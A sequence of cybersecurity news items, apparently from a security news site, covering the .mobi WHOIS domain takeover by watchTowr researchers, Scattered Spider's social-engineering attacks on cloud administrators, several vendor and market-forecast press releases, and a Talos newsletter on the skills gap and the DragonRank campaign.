Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

Source: Aree\_S via Shutterstock

Security researchers' ability to gain control of a chunk of the Internet's infrastructure for a mere $20 has focused attention on the fragility of the trust and cybersecurity mechanisms that organizations and users rely on daily.

The troubling event began with researchers at watchTowr on a whim looking for remote code execution vulnerabilities in WHOIS clients while at the recent Black Hat USA conference in Las Vegas. In poking around, the researchers discovered that the WHOIS server for the .mobi top level domain (TLD) — for mobile-optimized sites — had migrated a few years ago from "whois.dotmobiregistry.net" to "whois.nic.mobi". After the change, the registration for the original domain (whois.dotmobiregistry.net) expired last December.

**An Accidental Discovery**

A WHOIS server is like a public phone book for the Internet and contains information on the owners of an IP address or website along with lots of other related information. A WHOIS client is a tool that queries for and retrieves information about a specific domain name or IP address from a WHOIS server.

On a lark, the watchTowr researchers spent $20 to register the expired whois.dotmobiregistry.net in the company's name and stick a WHOIS server behind it to see if any WHOIS clients would query it. Their initial presumption was that few, if any, WHOIS clients would still touch the decommissioned server after the migration to the new .mobi authoritative WHOIS server (whois.nic.mobi) a few years ago.

To their surprise — and consternation — watchTowr researchers found over 76,000 unique IP addresses sending queries to their WHOIS server in just a couple hours. In about two days that number had ballooned to over 2.5 million queries from 135,000 unique systems worldwide.

Contrary to their expectations, among those querying watchTowr's WHOIS server were major domain registrars and websites performing WHOIS functions. Also querying watchTowr's WHOIS domain were mail servers for numerous government organizations in the US, Israel, Pakistan, India, the Philippines, a military entity in Sweden, and countless universities worldwide. Troublingly, even some security-related websites, including VirusTotal, queried watchTowr's WHOIS server as if it were the authoritative server for the .mobi TLD.

Had watchTowr been a bad actor, they could have easily abused their status as the owner of whois.dotmobiregistry.net to deliver malicious payloads to anyone querying the server, or to passively monitor email communications and potentially create other mayhem.

"In the wrong hands, owning the domain could enable attackers to 'respond' to queries and inject malicious payloads to exploit vulnerabilities in WHOIS clients," watchTowr's CEO and founder Benjamin Harris said in a FAQ on his company's discovery. From the standpoint of government mail servers reaching out to watchTowr's WHOIS servers, "traffic analysis can be performed to passively observe and infer email communication," he said.

**A Serious Domain Verification Weakness**

But even more troubling than that was watchTowr’s discovery of multiple Certificate Authorities (CA) — including those issuing TLS/SSL certificates for domains such as ‘microsoft.mobi and ‘google.mobi — using watchTowr’s server for domain verification purposes.

"It turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain— say watchTowr.mobi — and pulling out email addresses defined as the 'administrative contact'," watchTowr said. "The process is to then send that email address a verification link. Once clicked, the certificate authority is convinced that you control the domain that you are requesting a TLS/SSL cert for, and they will happily mint you a certificate."

In other words, watchTowr could provide its own email address to certificate authorities (CAs) in response to domain ownership queries and obtain TLS/SSL certificates on behalf of other organizations. Once again, contrary to expectations, watchTowr discovered multiple well known CAs — including Trustico, Comodo, GlobalSign, and Sectigo — using WHOIS data for domain verification.

"For 'microsoft.mobi', watchTowr demonstrated that CA GlobalSign would parse responses provided by its WHOIS server and present '\[email protected\]' as an authoritative email address," the security vendor said. "watchTowr's discovery effectively undermines the certificate authority process for the entire .mobi TLD, a process that has been targeted by nation-states overtly for years." The research highlights the trivial loopholes in the Internet's TLS/SSL vital encryption processes and structures and shows why trust in them is misplaced at this stage, the researchers wrote.

Nick France, CTO at Sectigo, says the issue has to do with CAs being allowed to use administrative emails on public WHOIS records for domain names. "However, the researchers found that the .mobi registry had changed their WHOIS server in the past and the 'old' name was now available as a registerable domain name — which they did," France says.

This is only a problem if a CA uses an outdated list of WHOIS server, he says. In that event, a CA's WHOIS query could get directed to an outdated server and any attacker that owns it could send any output in response, including an email address of their choice. "This leads to a failure of the domain verification process and thus mis-issued certificates."

The issue that watchTowr discovered highlights why CAs must keep their systems updated, especially with respect to critical processes like domain control validation, French says. "WHOIS is an old, insecure system — often neglected by researchers and users alike, leaving it primed for the discovery of flaws like this one," he notes.

While it may impact only smaller TLDs like .mobi, as opposed to .com, .net, and .gov, it still demonstrates a serious vulnerability in the domain verification process, he says.

Tim Callan, Sectigo's Chief Experience Officer, adds how the incident highlights a need to update some of the rules around Domain Control Validation (DCV). "We should expect the Certification Authority Browser Forum to move quickly on these changes in order to plug this particular hole."

In the meantime, the nonprofit Internet monitoring entity ShadowServer has sinkholed the dotmobiregistry.net domain and the whois.dotmobiregisry.net hostname and is redirecting all queries to the server to the legitimate WHOIS responsible for .mobi domains. "If you have code/systems still using the expired http://whois.dotmobiregistry.net to make WHOIS queries for the .mobi TLD, please update immediately to use the correct authoritative WHOIS server http://whois.nic.mobi," said Piotr Kijewski, ShadowServer's CEO in an email.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

For Just $20, Researchers Seize Part of Internet Infrastructure

The dangerous ransomware group is targeting financial and insurance sectors using smishing and vishing against IT service desk administrators, cybersecurity teams, and other employees with top-level privileges.

Source: Photo Spirit via Shutterstock

One of the world's most dangerous ransomware groups has been applying its hallmark savvy social engineering to targeted, sophisticated phishing attacks against financial and insurance companies, aiming to steal high-level permissions to cloud-based environments to ultimately deliver ransomware.

Scattered Spider has been using SMS and voice phishing — or smishing and vishing, respectively — attacks to target target high-privileged accounts, such as those of IT service desk administrators and cybersecurity teams. Attackers use the stolen credentials to compromise cloud-based services and ultimately gain access to victim environments for ransomware attacks, according to researchers at EclecticIQ.

"Scattered Spider frequently uses phone-based social engineering techniques … to deceive and manipulate targets, mainly targeting IT service desks and identity administrators," EclecticIQ Threat Intelligence Analyst Arda Büyükkaya wrote in a recent analysis. "The actor often impersonates employees to gain trust and access, manipulate MFA settings, and direct victims to fake login portals."

The attacks are so well-crafted that they often prompt unsuspecting identity administrators in charge of cloud infrastructures to enter credentials for VMware Workspace ONE, an application management and identity access policy platform, so attackers can gain unauthorized access even to accounts protected by multifactor authentication (MFA), Büyükkaya said.

**Cloud Services, SaaS in the Crosshairs**

Other ways Scattered Spider gains persistent access to cloud enviroments is to purchase stolen credentials, execute SIM swaps, and use cloud-native tools. In fact, the threat group is leveraging legitimate features of cloud infrastructure to carry out its nefarious activities, making their operations increasingly difficult to detect and counter, Büyükkaya noted.

"The cybercriminal group abuses legitimate cloud tools such as Azure’s Special Administration Console and Data Factory to remotely execute commands, transfer data, and maintain persistence while avoiding detection," he wrote.

The attacks observed by EclecticIQ targeted cloud-based services like Microsoft Entra ID and Amazon Web Services Elastic Computer Cloud, as well software as a service (SaaS) platforms such as Okta, ServiceNow, Zendesk, and VMware Workspace ONE "by deploying phishing pages that closely mimic single sign-on (SSO) portals," Büyükkaya wrote. These pages are delivered via socially engineered attacks that appear highly convincing — so much so that they even can fool cloud security engineers.

**Spinning a Complex Attack Web**

Scattered Spider, known also by Octo Tempest, made a significant name for itself in the ransomware game rather quickly. The group arrived on the scene in 2022 armed with sophisticated social-engineering techniques, an aptitude for understanding the psychology of Western business minds, and a command of native English — all of which it used as part of its heavy artillery. The group soon became infamous for the massive ransomware attacks on Caesars Palace and MGM Entertainment about a year later.

Scattered Spider teamed with BlackCat/Alphv ransomware early on but became a ransomware-as-a-service (RaaS) affilitate of RansomHub and Qilin earlier this year, after BlackCat/Alphv unceremoniously went dark in March, leaving affiliates in the lurch.

Of late, Scattered Spider has had global law enforcement, including the FBI, hot on its trail, and UK officials recently arrested a 17-year-old from the town of Walsall, UK, in July for his connection to the group.

The attacks outlined by EclecticIQ are the result of analysis conducted between 2023 and the second quarter of 2024, so it's as yet unclear how active Scattered Spider has been since that arrest. However, the research sheds new light on the complex web of attacks the group is capable of spinning to leverage identity compromise to target cloud environments successfully, the researchers noted.

**Defense and Mitigation**

EclecticIQ developed a specific framework outlining the ransomware deployment life cycle to help defenders thwart attacks by detailing the techniques used by the threat actor to infiltrate, persist, and execute ransomware within cloud environments. The accessibility of the cloud makes it a prime target for financially motivated criminals and has been the secret to success for Scattered Spider and other ransomware actors, according to Büyükkaya.

The company made a sweeping set of recommendations for organizations in terms of prevention, detection, and incident response that relate to but are not limited to: secure authentication; monitoring and alerts; hypervisor cloud resource security; firewall and network security; and other key and varied aspects that comprise an enterprise cloud environment.

Other recommendations made specifically focused on Scattered Spider's tendency to use phishing as its key method for initial access, advising organizations to regularly monitor for typosquatting domains. This includes their own organization’s legitimate domains, especially those targeting their own cloud environments.

"Proactively secure these domains to prevent phishing attacks and social engineering tactics," Büyükkaya advised.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Socially Savvy Scattered Spider Traps Cloud Admins in Web

PRESS RELEASE

SAN MATEO, Calif. — Sept. 10, 2024 — QuSecure™, Inc., a leader in post-quantum cryptography (PQC), today announced it has been selected for the United States Army Small Business Innovation Research (SBIR) project titled “Enhanced Post-Quantum Cryptography Suite for Tactical Networks.” 

This SBIR Phase II award further establishes QuSecure as a leading provider of Federal PQC solutions. The contract scope of work is organized to further enhance QuProtect™, the industry’s first end-to-end PQC software-based solution that enables organizations to springboard from cryptographic discovery and non-compliant algorithm detection straight to full quantum-resilience with live encryption management, continuous monitoring, vulnerability and alerting capabilities – all which can be achieved without the need to rip-and-replace current infrastructure.

“This project, in addition to all of our work and traction across all U.S. military branches, further validates that QuSecure is setting the standard for Federal PQC requirements,” said Pete Ford, Head of Federal Operations at QuSecure. “Serving the Government with this important U.S. Army project will provide Crypto Agility, Continuous Cryptographic Inventory (CCI) and Cryptography Orchestration (CO), so the U.S. Government can better protect and manage against classical, AI, and quantum computing threats to cryptography, bringing true resilience to the nation’s most secure encrypted communications for decades to come.”

This award is one of several that QuSecure has won in the past two years to address the most pressing PQC challenges being faced by the U.S. Government.

The recent landmark NIST PQC standards announcement was preceded by extensive government action over the past three years, with the aim of establishing U.S. leadership in protecting the nation’s digital assets form ongoing Harvest Now Decrypt Later (HNDL) attacks. The U.S. Government’s urgency to move toward a quantum safe future has been established with the recent actions taken by Congress and the White House. The Endless Frontiers Act set up a Technology and Innovation Directorate at the National Science Foundation, along with a $100 billion budget to research emerging technologies over five years, including quantum computing and post-quantum cryptography. Additionally, in December 2022 President Biden signed the Quantum Computing Cybersecurity Preparedness Act, a law that requires the Office of Management and Budget to prioritize federal agencies’ adoption of crypto-agile PQC as part of a greater migration effort to Zero Trust Network Access (ZTNA).

QuSecure’s QuProtect software is available now for testing and deployment. This suite offers a comprehensive, end-to-end quantum-security-as-a-service architecture that combines Crypto Agility, Continuous Cryptographic Inventory (CCI) and Cryptography Orchestration (CO) with zero-trust, next-generation quantum-resilient technology, cloud systems, edge devices, and satellite communications to protect networks against today’s cyberattacks and future quantum threats, all with minimal disruption to existing systems.

About QuSecure

QuSecure is a leader in quantum-safe cybersecurity with a mission to use the advent of quantum computing to act as a catalyst to fix the foundation of data security infrastructure. The QuProtect platform requires no quantum technologies to defend against quantum, AI, and classical threats to encryption, and can be purchased through the AWS marketplace or through direct outreach to QuSecure, Accenture, Dell, Cisco, or Carahsoft. QuSecure is proud to have more successful post-quantum cryptography deployments than any other organization in the world, and the technology is currently deployed with government, banking, telecommunications, and infrastructure customers across the globe. QuSecure’s quantum-resilient and crypto-agile solutions provide an easy transition path to quantum resiliency anytime, anywhere, on any device, and across any organization.

The company’s QuProtect solution is the industry’s first cryptographic-agility platform that facilitates the upgrade to PQC and beyond. You can Book a No-Obligation Two Hour CISO Road Mapping Workshop with QuSecure’s experts to get started on your PQC Migration planning and to take the QuProtect Software for a test drive.

US Army Selects QuSecure Solution for 'Enhanced Post-Quantum Cryptography Suite for Tactical Networks' Project

PRESS RELEASE

DELRAY BEACH, Fla., Sept. 10, 2024 /PRNewswire/ -- The global Security Testing Market size is projected to grow from USD 14.5 billionin 2024 to USD 43.9 billion by 2029 at a Compound Annual Growth Rate (CAGR) of 24.7% during the forecast period, according to a new report by MarketsandMarkets™.

One of the key factors promoting the security testing will be the increasing incidence of cyberattacks that target the software's vulnerabilities. However, the organizations, being in the digitalized world are getting more and more dependent on the digital applications that require the identification of the system's security risks and their resolution before the potential exploitation of such risks by the attackers which is becoming the new crucial practice. This rising concern pushes organizations to adopt the security testing process in order to guard their systems, data, and reputation from the possible breaches.

Request Sample Pages@ https://www.marketsandmarkets.com/requestsampleNew.asp?id=150407261

Based on the application testing tools, SAST accounts for the highest market size during the forecast period.

The adoption of Static Application Security Testing (SAST) tools is increasing as organizations prioritize secure software development. SAST tools enable developers to identify and fix security vulnerabilities early in the coding process, reducing the risk of security flaws in production. This shift is driven by the growing emphasis on integrating security into the software development lifecycle (SDLC) and the need to comply with stringent security standards. As a result, more companies are adopting SAST tools to enhance code security, improve development efficiency, and ensure that applications are robust against cyber threats from the outset.

By Application security testing type, web application security testing accounts for the highest market size during the forecast period.

The adoption of web application security testing is growing as organizations increasingly rely on web-based platforms for business operations and customer interactions. With the rise in cyber threats targeting web applications, such as SQL injection and cross-site scripting (XSS), companies are prioritizing security testing to identify and mitigate vulnerabilities before they can be exploited. This proactive approach is driven by the need to protect sensitive data, ensure compliance with regulations, and maintain customer trust in an environment where web applications are a critical part of the business landscape.

Inquire Before Buying@ https://www.marketsandmarkets.com/Enquiry\_Before\_BuyingNew.asp?id=150407261

By Region, Asia Pacific will grow at the highest CAGR during the forecast period.

The adoption of security testing services in the Asia Pacific region is rapidly increasing due to the region's expanding digital economy and the rising threat of cyberattacks. As businesses in Asia-Pacific embrace digital transformation and cloud computing, the need to identify and address vulnerabilities in their systems has become crucial. Regulatory pressures and growing awareness of cybersecurity risks are also driving organizations to invest in security testing solutions to ensure the resilience of their IT infrastructure and protect sensitive data from breaches. This trend is further fueled by the region's diverse and complex threat landscape, prompting a proactive approach to cybersecurity.

Top Key Companies in Security Testing Market:

IBM (US), HCLTech (India), Synopsys (US), OpenText (UK), Cigniti (US), Qualitest (UK), Intertek (UK), DXC Technology (US), eInfochips (US), Checkmarx (US), HackerOne (US), Invicti (US), DataArt (US), Cobalt Labs (US), Trustwave (US), Contrast Security (US), Veracode (US), Qualys (US), OffSec (US), NCC Group (UK), GitHub (US), Bugcrowd (US), Applause (US), Rapid7 (US), Parasoft (US), BreachLock (US), ImmuniWeb (Switzerland), Pentest People (UK), SafeAeon (US), and REDTEAM.PL (Poland) are the key players and other players in the Security Testing Market.

Browse Adjacent Market: Information Security Market Research Reports & Consulting

Browse Other Reports:

Blockchain Security Market - Global Forecast to 2029

IoT Security Market - Global Forecast to 2029

Exposure Management Market\- Global Forecast to 2029

Next-Generation Firewall Market\- Global Forecast to 2028

Digital Signature Market\- Global Forecast to 2028

Get access to the latest updates on Security Testing Companies and Security Testing Industry

About MarketsandMarkets™ 

MarketsandMarkets™ has been recognized as one of America's best management consulting firms by Forbes, as per their recent report.

MarketsandMarkets™ is a blue ocean alternative in growth consulting and program management, leveraging a man-machine offering to drive supernormal growth for progressive organizations in the B2B space. We have the widest lens on emerging technologies, making us proficient in co-creating supernormal growth for clients.

Earlier this year, we made a formal transformation into one of America's best management consulting firms as per a survey conducted by Forbes.

The B2B economy is witnessing the emergence of $25 trillion of new revenue streams that are substituting existing revenue streams in this decade alone. We work with clients on growth programs, helping them monetize this $25 trillion opportunity through our service lines - TAM Expansion, Go-to-Market (GTM) Strategy to Execution, Market Share Gain, Account Enablement, and Thought Leadership Marketing.

Built on the 'GIVE Growth' principle, we work with several Forbes Global 2000 B2B companies - helping them stay relevant in a disruptive ecosystem. Our insights and strategies are molded by our industry experts, cutting-edge AI-powered Market Intelligence Cloud, and years of research. The KnowledgeStore™ (our Market Intelligence Cloud) integrates our research, facilitates an analysis of interconnections through a set of applications, helping clients look at the entire ecosystem and understand the revenue shifts happening in their industry.

To find out more, visit www.MarketsandMarkets™.com or follow us on Twitter, LinkedIn and Facebook.

Security Testing Market Worth $43.9B by 2029

PRESS RELEASE

REDDING, Calif., Sept. 10, 2024 /PRNewswire/ -- According to a new market research report titled, 'SCADA Market by Type (Monolithic SCADA Systems, Distributed SCADA Systems, Networked SCADA Systems), Component (Hardware, Software, Services), Deployment Mode, End-use Industry (Oil & Gas, Automotive, F&B)—Global Forecast to 2031.

The rising adoption of automated technologies across Europe and Asia-Pacific, the advent of Industry 5.0, the growing demand for smart and digitized production processes, and the increasing emphasis on industrial automation are key factors driving the growth of SCADA. However, the high initial investment requirements for SCADA implementation are restraining the growth of this market.

Furthermore, the growing adoption of wireless sensor networks and the proliferation of smart factories are expected to generate growth opportunities for the players operating in this market. However, the risk of cyberattacks is a major challenge impacting market growth. Furthermore, the rising adoption of Industry 4.0 technologies and the increasing reliance on Human-Machine Interface (HMI) systems are prominent trends in the SCADA market.

Advent of Industry 5.0 Boosting the Demand for Scada Systems 

Industry 5.0, also known as the Fifth Industrial Revolution, is a new and emerging phase of industrialization that builds upon the principles of Industry 4.0 but emphasizes the human touch and the integration of human skills with advanced technologies. Industry 4.0 focused on technologies such as the Internet of Things and big data, whereas Industry 5.0 seeks to involve human, environmental, and social aspects.

As Industry 5.0 promotes enhanced collaboration between humans and machines, there is an increasing demand for sophisticated automation and control systems capable of effectively bridging the gap between these elements. SCADA systems facilitate real-time monitoring and control of industrial processes, playing an important role in enabling seamless interactions between humans and machines. They offer the necessary infrastructure for incorporating human input and feedback into automated workflows, thereby optimizing performance and efficiency. With Industry 5.0 driving the adoption of advanced technologies, the requirement for comprehensive monitoring and control solutions to ensure seamless integration and coordination is growing. SCADA systems have significantly improved the reliability and capability of automation. Centralized SCADA systems are increasingly utilized for decision-making in hazardous situations to prevent accidents in complex infrastructure. These systems oversee and manage entire sites, support informed decision-making, enhance efficiency, and minimize downtime. The advantages provided by SCADA systems, coupled with the escalating need to maintain the integrity and reliability of critical infrastructure, are driving market growth.

Governments are actively supporting industrial automation and digitalization initiatives. For example, in January 2021, the President of Spain introduced three new plans for SMEs (2021-2025)—the Connectivity Plan, the Strategy to Promote 5G Plan, and the National Strategy for Artificial Intelligence. These plans are part of the Spain 2025 Digital Agenda and aim to advance the development and deployment of SCADA systems across various industries. By enhancing capabilities and driving digital transformation, these initiatives are increasing demand for SCADA systems and contributing to market growth.

SCADA Market Analysis: Key Segmental Findings

*   By Type: In 2024, the networked SCADA systems segment is expected to account for the largest share of 47.5% of the SCADA market. Moreover, this segment is projected to register the highest CAGR of 8.2% during the forecast period from 2024 to 2031.
    
*   By Component: In 2024, the hardware segment is expected to account for the largest share of 55.9% of the SCADA market. However, the software segment is estimated to record the highest CAGR during the forecast period from 2024 to 2031.
    
*   By Deployment Mode: In 2024, the on-premise deployments segment is expected to account for the dominant share of the SCADA market. However, the cloud-based deployments segment is anticipated to register the highest CAGR of 10.5% during the forecast period from 2024 to 2031.
    
*   By End-use Industry: In 2024, the manufacturing segment is expected to account for the major share of 26.4% of the SCADA market. However, the automotive segment is slated to record the highest CAGR of 10.7% during the forecast period from 2024 to 2031.
    

Get A Glimpse Inside: Request Sample Pages \- https://www.meticulousresearch.com/request-sample-report/cp\_id=5186

Geographic Analysis:

By geography, the SCADA market is segmented into North America, Europe, Asia-Pacific, Latin America, and the Middle East & Africa. In 2024, North America is estimated to account for the largest share of 32.1% of the SCADA market. The North America SCADA market is expected to reach $5,488.3 million by 2031.

The industrial sector has seen extensive implementation of automation systems, especially in North America. Manufacturers in this region are increasingly deploying advanced automation technologies in their operations. North American countries are competing with their Asian and European counterparts to position themselves as key manufacturing centers, with the goal of lowering costs related to importing goods. The high labor costs in the U.S. are a primary impetus for the adoption of process control systems, such as SCADA (Supervisory Control and Data Acquisition), MES (Manufacturing Execution System), and DCS (Distributed Control System). These systems are instrumental in reducing the need for human oversight and management of automation processes.

Key market players are focusing on developing SCADA solutions with advanced features tailored for various industrial applications, including oil & gas, power, utilities, automotive, electronics, and F&B. For example, in October 2022, Emerson Electric Co. (U.S.) introduced Movicon.NExT 4.2, an advanced automation platform designed for seamless integration with field devices and enterprise systems. This software provides the data and insights necessary for achieving operational excellence across diverse applications in discrete and hybrid manufacturing sectors, including F&B, packaged consumer goods, energy, infrastructure, building automation, and machine automation.

Furthermore, in October 2022, AtomTech (U.S.) expanded its North American presence by launching AtomTech Canada. This move addresses the growing demand for automation, cybersecurity, SCADA, and IIoT 4.0 solutions across industries such as automotive, medical equipment, and warehouse logistics. Such developments support the growth of the SCADA market in the region during the forecast period.

Have specific research needs? Request a customized research report:- https://www.meticulousresearch.com/request-customization/cp\_id=5186

Asia-Pacific: The Fastest-growing Regional Market

The SCADA market in Asia-Pacific is poised to register the highest CAGR during the forecast period. In 2024, China is expected to account for the major share of the SCADA market in Asia-Pacific. Asia-Pacific generates significant growth opportunities for the adoption of industrial process control solutions, given its extensive and diverse manufacturing sector. Traditionally, manual or semi-automatic control processes have characterized industrial production in the region. However, advanced automation solutions are becoming essential for achieving the flexibility required in high-volume production lines, thereby enhancing overall operational efficiency.

Asia-Pacific is a prominent manufacturing hub across multiple sectors, including automotive, electronics, consumer goods, pharmaceuticals, and more. This manufacturing prominence is a significant driver of automation technology adoption in the region. SCADA solutions are increasingly being adopted in countries such as China, Japan, South Korea, and India, driven by efforts to modernize manufacturing facilities and the need for SCADA software to interface with Remote Terminal Units (RTUs), Programmable Logic Controllers (PLCs), and Human-Machine Interface (HMI) components. The focus on improving process efficiencies and reducing production costs further fuels market growth, enabling operators to analyze and make decisions from remote locations.

The rapid advancement of automation and artificial intelligence (AI) is having a profound impact on economies in the APAC region. Asiais expected to be the fastest-growing automation market, driven by factors such as population growth, urbanization, economic development, rising wages, and decreasing costs associated with automated industrial technologies. The increasing awareness of advanced industrial control solutions, including SCADA systems for comprehensive manufacturing process monitoring, is a key driver of this market growth.

The U.K. Continues to Dominate the SCADA Market in Europe

In 2024, the U.K. is expected to account for the largest share of the SCADA market in Europe. Several factors are driving the adoption of industrial control systems in the U.K., including the expansion of the manufacturing industry, stringent manufacturing and industrial safety regulations, increased diversity in consumer products, growing awareness of automated systems, and rising labor costs. Many enterprises and industries in the U.K. are increasingly adopting automated machines and control solutions to enhance operational process monitoring. Key sectors such as oil & gas, power, automotive, F&B, electronics, and semiconductors are leading the way in implementing industrial control systems. In response to the evolving needs of these industries, market players are actively developing advanced SCADA solutions. For example, in September 2020, Severn Trent plc (U.K.) invested USD 6.4 million to upgrade its SCADA monitoring and management systems to a cloud-based platform.

SCADA Market: Competition Analysis

This report offers a competitive analysis based on an extensive assessment of the leading players' product portfolios, geographic presence, and key growth strategies adopted over the past three to four years. Major companies in the SCADA market have implemented various strategies to expand their product offerings and global footprints and augment their market shares. The key strategies followed by most companies in the SCADA market were product launches & enhancements, acquisitions, expansion, partnerships, agreements, and collaborations. The key market players operating in the SCADA market include Rockwell Automation, Inc. (U.S.), Siemens AG (Germany), Eaton Corporation plc (Ireland), Schneider Electric SE (France), ABB Ltd (Switzerland), Yokogawa Electric Corporation (Japan), General Electric Company (U.S.), Emerson Electric Co. (U.S.), Honeywell International, Inc. (U.S.), Mitsubishi Electric Corporation (Japan), OMRON Corporation (Japan), Pilz GmbH & Co. KG (Germany), Survalent Technology Corporation (Canada), Valmet (Finland), and Hitachi, Ltd. (Japan).

Browse In-Depth Report Now - https://www.meticulousresearch.com/product/scada-market-5186

SCADA Industry Overview: Latest Developments from Key Industry Players

*   In June 2023, Siemens AG introduced the SICAM 8 power automation platform, which includes two new software solutions: the SICAM HMI (Human Machine Interface) visualization tool and the SICAM S8000 software solution for power automation. This platform is part of the Siemens Xcelerator portfolio, an open digital platform designed to help customers accelerate their digital transformation at scale.
    
*   In April 2023, Siemens AG partnered with Gujarat Metro Rail Corporation Limited (GMRCL) (India) to advance rail electrification technologies. Siemens Limited will deliver project management services and cutting-edge rail electrification technologies, including advanced power supply and distribution systems. Additionally, Siemens Limited will provide sophisticated digital solutions, such as Supervisory Control and Data Acquisition (SCADA) systems, for both metro projects.
    
*   In March 2023, Rockwell Automation launched FactoryTalk Optix, a new addition to the company's visualization portfolio. FactoryTalk Optix is a modern, cloud-enabled human-machine interface (HMI) platform that allows users to design, test, and deploy applications directly from a web browser remotely, in real time.
    
*   In February 2023, ABB launched the ABB Ability Symphony Plus distributed control system that delivers seamless and secure access to an extended digital ecosystem for power generation and water industries. It increases performance and enables plant-wide digitalization, offering a noninvasive modernization of the installed base.
    
*   In October 2022, Emerson released a new version of its DeltaV distributed control system (DCS). Version 15 helps plants digitally transform operations through improved production optimization and enhanced operator performance.
    
*   In April 2022, ABB partnered with Ramboll (Denmark) to explore new opportunities in offshore substations. ABB will leverage its expertise in the design and supply of electrical, SCADA, automation, and telecommunications equipment. This includes engineering, products, installation, commissioning, and operational maintenance of these systems.
    
*   In January 2022, Schneider Electric entered into an agreement with AVEVA, a leading technology company. This collaboration was designed to further AVEVA's digital and sustainability objectives. Schneider Electric's extensive reach and profound market expertise will support AVEVA in sustaining, expanding, and enhancing its leadership in the industrial automation software and SCADA sectors across the Pacific region.
    
*   In April 2021, Mitsubishi Electric updated its SCADA lineup with GENESIS64, introducing two new software products for system monitoring and process control. This new software suite replaced the MC Works64 SCADA software, which was designed for monitoring small production lines and managing multi-site monitoring.
    
*   In January 2021, Rockwell Automation acquired Fiix Inc. (Canada), an AI-enabled computerized maintenance management system (CMMS) company. This acquisition bolsters Rockwell Automation's software strategy and strengthens its Lifecycle Services business. The addition of Fiix enhances the company's ability to offer a comprehensive range of industrial automation services, aimed at maximizing the value of customers' production assets, systems, plants, and processes.

SCADA Market Is Set to Reach $18.7B by 2031

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America.

Thursday, September 12, 2024 14:00

I have written about the dreaded “cybersecurity skills gap” more times than I can remember in this newsletter, but I feel like it’s time to revisit this topic again.  

That’s because the White House announced a new initiative last week for the U.S. government called the “Service for America” initiative designed to train new workers in the cybersecurity field. This measure directs U.S. federal agencies to help recruit and prepare Americans for jobs in cybersecurity and AI by removing certain degree requirements and emphasizing skills-based hiring. This means, hopefully, more educational resources for people looking to break into cybersecurity. 

On its face, I’m all in favor of this. I did eventually go back to school to get my associate's degree in cybersecurity, but much of what I’ve learned about this field has been from working at Talos and spending time around my talented and intelligent colleagues, many of whom did not go to college for cybersecurity.  

The U.S. government also has separate initiatives to support neurodivergent candidates who want to work in security, as well as those who are blind and visually impaired. 

My concern is that, even if we do train these employees and give them the proper skills, it’s on companies to eventually hire them.  

A June report from CyberSeek found that there are only enough skilled workers to fill 85 percent of cybersecurity jobs in America. Yet hiring in the industry has remained flat, according to a soon-to-be-released report from cybersecurity non-profit ISC2. This year, the global security workforce is estimated to be 5.5 million, which is only a 0.1 percent increase year over year, according to the report. 

Among the more than 15,000 cybersecurity practitioners from around the globe who responded to the study, 38 percent of respondents said their organizations had experienced a cybersecurity hiring freeze over the past year, up 8 percent from 2023. Thirty-seven percent of respondents reported budget cuts to the security program, and another 25 percent said their teams had experienced layoffs.  

That same CyberSeek report also found that, in the U.S., the amount of cybersecurity-related job postings decreased by 29 percent year-over-year. 

So as these skills gap-closing programs begin, we need to be thinking about what skills, exactly, managers want their workers to be trained in. There is obviously some sort of disconnect here between the people who want to work in security compared to the companies or managers who want to hire them. Or there just simply isn’t enough money to go around right now to handle staffing up cybersecurity teams, and that’s just the reality of the current economy in the U.S. and globally.  

I’m not saying this to discourage anyone from entering the security space or spread doom and gloom. But I do think it’s important to acknowledge that there are many already skilled and trained workers who simply cannot find work or are treading water throwing dozens of applications at the wall to see what sticks. 

I’ve seen too many people posting on LinkedIn recently looking for a cybersecurity job to think that the solution to bolstering security is getting \*another\* worker in with the same skillset to compete for the same job opening as someone who’s been in the industry for 10 years. 

**The one big thing **

Talos recently uncovered a new threat called “DragonRank” that primarily targets countries in Asia — and a few in Europe — operating PlugX and BadIIS for search engine optimization (SEO) rank manipulation. DragonRank exploits targets’ web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities. Their PlugX not only used familiar sideloading techniques, but the Windows Structured Exception Handling (SEH) mechanism ensures that the legitimate file can load the PlugX without raising suspicion. 

**Why do I care? **

This group compromises Windows Internet Information Services (IIS) servers hosting corporate websites, with the intention of implanting the BadIIS malware. BadIIS is malware used to manipulate search engine crawlers and disrupt the SEO of the affected sites. With those compromised IIS servers, DragonRank can distribute the scam website to unsuspecting users. DragonRank engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results. They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings. These attacks can harm a company's online presence, lead to financial losses, and damage its reputation by associating the brand with deceptive or harmful practices. The actor then takes these compromised websites and promotes them, effectively turning these sites into platforms for scam operations. 

**So now what? **

Talos released a new Snort rule set and several ClamAV signatures to detect and block the malware used in these attacks. Talos has confirmed more than 35 IIS servers had been compromised and deployed the BadIIS malware across a diverse array of geographic regions, including Thailand, India, Korea, Belgium, Netherlands and China in this campaign, so it’s clearly still active and potentially growing. 

**Top security headlines of the week **

